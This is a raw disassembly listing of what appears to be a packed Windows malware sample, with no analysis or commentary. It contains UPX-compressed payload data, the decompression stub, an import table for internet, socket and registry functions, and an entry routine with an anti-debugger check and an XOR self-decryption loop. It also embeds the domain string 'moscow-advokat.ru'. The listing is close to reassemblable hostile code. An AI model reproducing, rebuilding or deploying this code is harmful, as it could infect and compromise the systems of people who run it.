dd 7974690Ah, 6E614D20h, 58C5E91Eh, 31C91AB1h, 0C59DB48Ch
dd 5234D376h, 80E4153h, 0FFFFEFBCh, 0A4C11BFFh, 0DD499F8Eh
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 0EDFFFFFFh, 8C9AC3F2h, 0CC4D8556h, 0D3AD0FE1h, 37691506h
dd 98A8FD8Dh, 0CE700B16h, 1445504Fh, 0F837FFFFh, 0EF324A39h
dd 0D847AEE3h, 0BA84DFBDh, 7380371Eh, 0DF58B81h, 92E07D4Ah
dd 0E8DFFFFFh, 0B8C52DFEh, 85E020C6h, 5068BD9Ch, 50B6296Ah
dd 42C33482h, 9808117Fh, 0FFFFFFFFh, 0E7B7B21Ch, 77899D9Ch
dd 0D3971A3Dh, 8D5029A4h, 463A96A5h, 12E8FC8Dh, 0AF10EB16h
dd 0F8457044h, 0FFFFFFEAh, 78966AD0h
dd 51439FB1h, 86A827EBh, 98A3970h, 0A1C214DEh, 167A53C1h
dd 9785C4BFh, 0A0DFA378h, 9829E70Fh, 53899E9Eh, 940724FEh
dd 0FFFFFFFFh, 75A3ECCAh, 0F91DA11Eh, 0CBC5B4E8h, 0F0DB1A4Eh
dd 873969D7h, 7B948C1Ah, 821318C6h, 4BBF3EB3h, 0F02FFFFFh
dd 0EB67E042h, 60B737B2h, 0D7D8B3AAh, 65048022h, 0FF4BA67Ah
dd 45855886h, 0FC1BFFA6h, 0EEF96EF6h, 3290C956h, 0B7A63B4Ah
dd 0EBD3D87Ah, 97EE4263h, 0F7041888h, 31505FE8h, 0A69A03CCh
dd 98B49A69h, 2C3C5878h, 69B2CD34h, 0DC5EF814h, 34D3B4CCh
dd 90A4D34Dh, 0B607480h, 7142E96Dh, 5B6D2E9Fh, 6CDC0575h
dd 0A7685B24h, 0B700492Eh, 96B60D64h, 6BC52C2Dh, 611C67ADh
dd 0DB01F06Eh, 2C7586D8h, 7A6F2F72h, 70DB7962h, 41D9ACBCh
dd 0A4147262h, 0AD600C79h, 58796C25h, 0D6674A38h, 0CA6B46F1h
dd 732E61B6h, 84277578h, 6EC73A36h, 3D2E1646h, 6D80B067h
dd 2FCA468Eh, 51C6C28h, 6734BB7Bh, 116F701Ah, 13617A2Eh
dd 0CF1B66C3h, 61FE3309h, 401A5F13h, 676F8E6Eh, 776B7543h
dd 675DBD90h, 1F74D85Eh, 1FA56364h, 0FCA9EB59h, 2D736F6Ch
dd 0A72E5861h, 6BADB220h, 0AB75E35Bh, 0BE62166Ch, 0B6BB253Dh
dd 7266B92Fh, 4A616C66h, 0EEC09FEh, 61726733h, 74612E7Ah
dd 6D0B8180h, 7736876Dh, 7DBBDA2Dh, 1EE5AE6Ah, 6362CB75h
dd 0BF676621h, 7FDB0BEAh, 6D6C6B6Ah, 71706F6Eh, 77927452h
dd 0DA7A7978h, 0F95FFE58h, 44434241h, 48474645h, 4E4B4A49h
dd 7B5751FCh, 544058A1h, 5A59581Ah, 0F5ADB81Bh, 77A08152h
dd 0B62A2038h, 2140E907h, 0FF8C6702h, 0F60C4BCBh, 4B43CA56h
dd 26501320h, 0F66E9553h, 4E4F0B64h, 490B0A47h, 0FA5DAC3Fh
dd 92353407h, 2F0C4F4Ah, 54495551h, 24816B6Fh, 477B561Ah
dd 0B6E5F766h, 74231163h, 841779B5h, 0C0E0075Fh, 20A202CBh
dd 0BED6F328h, 6203E85Dh, 34203B64h, 36204549h, 0B060915h
dd 0B41EAC30h, 70164035h, 29EC5Fh, 371776Bh, 0CEBA2C61h
dd 4D02E6B5h, 690F075Ch, 8127C03h, 2D6569B7h, 0A6C71331h
dd 0C48A08BBh, 0FFEE4009h, 6C01FF97h, 63727473h, 4741706Dh
dd 6F4C7465h, 656C6163h, 6F666E49h, 56715B0Fh, 44525394h
dd 452E6309h, 797F14B7h, 65595715h, 588A4746h, 9E303483h
dd 0BD9A6954h, 0E6DB997h, 206F540Bh, 0ED65A015h, 4146000Ch
dd 3C42BF0Ch, 4D3F0DF6h, 2DAC646Fh, 0B016614Eh, 8E412D93h
dd 7E5E4169h, 6F40AEFh, 4309DF1Fh, 1E79706Fh, 387BFEE4h
dd 456E6993h, 81516578h, 0ED06FFF6h, 9A6C6F7Eh, 53323370h
dd 7370616Eh, 19746F68h, 0A0CDADDDh, 723212D3h, 5540F73h
dd 0C641AD73h, 0F6182C35h, 2180FB06h, 7478654Eh, 54727068h
dd 7867CB6Ch, 0FF087645h, 538B4661h, 42B7B9B1h, 624F7BE4h
dd 4414996Ah, 0A136796h, 4CB715CFh, 0CAC94561h, 263A15ADh
dd 6378452Fh, 7B61DBB2h, 5C6E2354h, 65706506h, 5F092C97h
dd 2E6E4711h, 0D8A06F12h, 64410B3Fh, 140F7264h, 7262694Ch
dd 84B60C28h, 4D2B8961h, 8DC4625h, 5FAB1F67h, 100E4865h
dd 9F874496h, 0C2E16CCBh, 701D166Ch, 476B63A2h, 6D61D12Dh
dd 4DE57275h, 366C78DFh, 0C4F39289h, 45986A0Dh, 0E193198h
dd 7B0E8162h, 31E91943h, 0DB639249h, 6BE48376h, 630A6465h
dd 522D6D13h, 70C9785Dh, 45083A1Bh, 0C426657Ah, 3D5E8613h
dd 5868D100h, 15EECDA1h, 1A747079h, 710C4B2h, 0A2FB6CDh
dd 0E611244h, 0C3057BECh, 79666976h, 3CCA6746h, 0B7B016D5h
dd 578F10A1h, 112C796Fh, 0BEC1866Dh, 1079654Bh, 651EB252h
dd 178763F9h, 4114EF3Eh, 69757163h, 871A1672h, 8F494D0Dh
dd 0B9B6745Ch, 0C13AF759h, 0EF0D9267h, 3B0E1041h, 3E0D2194h
dd 90EC510Fh, 350AD6B0h, 98302511h, 2D0466C5h, 0E19E1021h
dd 5FB5458Eh, 0F5696241h, 0C34D6853h, 0AF8B1446h, 0F8DE136Eh
dd 3B77E5DDh, 5696F78h, 69736E61h, 0B6EF6304h, 736FCBF6h
dd 5F48455Fh, 6744DC70h, 78435F0Bh, 98263878h, 0E74C6C4Ah
dd 83936B81h, 768627Dh, 2A427970h, 9A15BB3Bh, 5FDDCFE2h
dd 29332868h, 1CD7399Bh, 11727473h, 5B49060Dh, 6D6C31CCh
dd 0AC0FBA36h, 0D9B6B774h, 3CE9946Ch, 7C737701h, 1966748Bh
dd 5219A682h, 5639651Bh, 3AA29168h, 0BD8146Fh, 1B366331h
dd 0C7290B21h, 5383B669h, 0F44F6449h, 0F6D83B50h, 35A78AE0h
dd 11417355h, 5B01196Ch, 1B114E0Eh, 5D3706A6h, 77936EBBh
dd 0C5D55753h, 525574A2h, 0B2CBA564h, 2125B2Ch, 0D027308h
dd 0B2CB2C01h, 0B6F392Ch, 2CB21734h, 90CB2CBh, 54101304h
dd 16CA00CFh, 46455057h, 2FA025F5h, 0D3275DB7h, 9ACF0340h
dd 0F001FEDh, 6010B01h, 1312340Ch, 98D81D18h, 30E5017Bh
dd 0DD0B3135h, 2C0092Ch, 700C076Bh, 25B99D81h, 710341Eh
dd 0B258E58Ah, 3B680306h, 176C28Ch, 0B0647FC2h, 53581E01h
dd 42EBA75h, 0C1903303h, 34360608h, 0C837C0C4h, 0E004F4EDh
dd 0FB90642Eh, 271211CDh, 48586E0Ah, 0C03838h, 61800060h
dd 33D205Bh, 1962Ch, 0
dd 0FF2000h, 2 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset aMoscowAdvokat_ ; "moscow-advokat.ru"
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31508422
; ---------------------------------------------------------------------------
align 8
loc_31508418: ; CODE XREF: UPX1:loc_31508429�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_3150841E: ; CODE XREF: UPX1:315084B6�j
; UPX1:315084CD�j
add ebx, ebx
jnz short loc_31508429
loc_31508422: ; CODE XREF: UPX1:31508410�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508429: ; CODE XREF: UPX1:31508420�j
jb short loc_31508418
mov eax, 1
loc_31508430: ; CODE XREF: UPX1:3150843F�j
; UPX1:3150844A�j
add ebx, ebx
jnz short loc_3150843B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3150843B: ; CODE XREF: UPX1:31508432�j
adc eax, eax
add ebx, ebx
jnb short loc_31508430
jnz short loc_3150844C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31508430
loc_3150844C: ; CODE XREF: UPX1:31508441�j
xor ecx, ecx
sub eax, 3
jb short loc_31508460
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_315084D2
mov ebp, eax
loc_31508460: ; CODE XREF: UPX1:31508451�j
add ebx, ebx
jnz short loc_3150846B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3150846B: ; CODE XREF: UPX1:31508462�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31508478
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508478: ; CODE XREF: UPX1:3150846F�j
adc ecx, ecx
jnz short loc_3150849C
inc ecx
loc_3150847D: ; CODE XREF: UPX1:3150848C�j
; UPX1:31508497�j
add ebx, ebx
jnz short loc_31508488
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508488: ; CODE XREF: UPX1:3150847F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_3150847D
jnz short loc_31508499
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_3150847D
loc_31508499: ; CODE XREF: UPX1:3150848E�j
add ecx, 2
loc_3150849C: ; CODE XREF: UPX1:3150847A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_315084BC
loc_315084AD: ; CODE XREF: UPX1:315084B4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_315084AD
jmp loc_3150841E
; ---------------------------------------------------------------------------
align 4
loc_315084BC: ; CODE XREF: UPX1:315084AB�j
; UPX1:315084C9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_315084BC
add edi, ecx
jmp loc_3150841E
; ---------------------------------------------------------------------------
loc_315084D2: ; CODE XREF: UPX1:3150845C�j
pop esi
mov edi, esi
mov ecx, 0CAh
loc_315084DA: ; CODE XREF: UPX1:315084E1�j
; UPX1:315084E6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_315084DF: ; CODE XREF: UPX1:31508504�j
cmp al, 1
ja short loc_315084DA
cmp byte ptr [edi], 1
jnz short loc_315084DA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_315084DF
lea edi, [esi+6000h]
loc_3150850C: ; CODE XREF: UPX1:3150852E�j
mov eax, [edi]
or eax, eax
jz short loc_31508557
mov ebx, [edi+4]
lea eax, [eax+esi+8000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+808Ch]
xchg eax, ebp
loc_31508529: ; CODE XREF: UPX1:3150854F�j
mov al, [edi]
inc edi
or al, al
jz short loc_3150850C
mov ecx, edi
jns short near ptr loc_3150853A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_3150853A: ; CODE XREF: UPX1:31508532�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+8090h]
or eax, eax
jz short loc_31508551
mov [ebx], eax
add ebx, 4
jmp short loc_31508529
; ---------------------------------------------------------------------------
loc_31508551: ; CODE XREF: UPX1:31508548�j
call dword ptr [esi+8094h]
loc_31508557: ; CODE XREF: UPX1:31508510�j
popa
jmp loc_31501D18
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00009000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00009000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31509000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 90C4h, 908Ch, 3 dup(0)
dd 90D1h, 909Ch, 3 dup(0)
dd 90DEh, 90A4h, 3 dup(0)
dd 90E9h, 90ACh, 3 dup(0)
dd 90F4h, 90B4h, 3 dup(0)
dd 9100h, 90BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C4D444h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 69730000h
dd 6Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
; ---------------------------------------------------------------------------
public start
start:
pop ebx
call loc_3150925F
mov esp, [esp+8]
mov eax, 4EBh ; CODE XREF: UPX2:3150920F�j
jmp short near ptr loc_3150920A+1
; ---------------------------------------------------------------------------
mov eax, fs:18h
mov eax, [eax+30h]
movzx eax, byte ptr [eax+2]
cmp eax, 0
jnz short locret_3150925E
call $+5
pop ebp
sub ebp, 402320h
mov eax, [ebp+402367h]
add eax, [ebp+40236Fh]
mov esi, eax
mov eax, [ebp+40236Bh]
add eax, [ebp+40236Fh]
push eax
mov edi, esi
xor ecx, ecx
loc_3150924D: ; CODE XREF: UPX2:3150925C�j
lodsb
xor al, [ebp+402377h]
stosb
inc ecx
cmp ecx, [ebp+402373h]
jl short loc_3150924D
locret_3150925E: ; CODE XREF: UPX2:31509220�j
retn
; ---------------------------------------------------------------------------
loc_3150925F: ; CODE XREF: UPX2:31509201�p
sub eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, 12345678h
xchg eax, [ebx]
add [eax+0], ah
; ---------------------------------------------------------------------------
db 2 dup(0), 84h
align 8
dd 26003150h, 500000h, 760h dup(0)
UPX2 ends
; Section 4. (virtual address 0000B000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000B000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 3150B000h
align 2000h
_idata2 ends
end start